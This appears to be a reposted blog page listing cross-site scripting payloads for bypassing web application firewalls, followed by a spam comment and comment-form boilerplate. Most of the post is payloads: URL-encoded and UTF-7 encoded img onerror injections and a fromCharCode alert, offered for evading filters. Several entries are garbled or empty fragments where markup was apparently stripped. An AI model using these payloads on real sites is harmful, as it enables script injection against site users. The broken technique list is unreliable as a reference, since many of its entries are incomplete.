Cross site scripting,XSS,bypass XSS filter,xss payload

Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:

Case insensitive: alert(‘123’)

use other tag: XSS
<img a=”

use comment: %0aalert(1);

Two-letter bypass:


Other events bypassonload

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux.


2 comentários sobre “Cross site scripting,XSS,bypass XSS filter,xss payload

  1. He was the co-founder and principal of GmbH (Belgium), an organization specializing in webmaster software growth, industrial-energy cloaking and a wide range
    of upmarket search engine optimization instruments and
    providers, pioneering amongst other things such benchmark merchandise because the world’s most complete database of verified search engine spiders, fully automated IP supply purposes, link constructing community administration software and
    automated personalized content material creation.

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do

Você está comentando utilizando sua conta Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )


Conectando a %s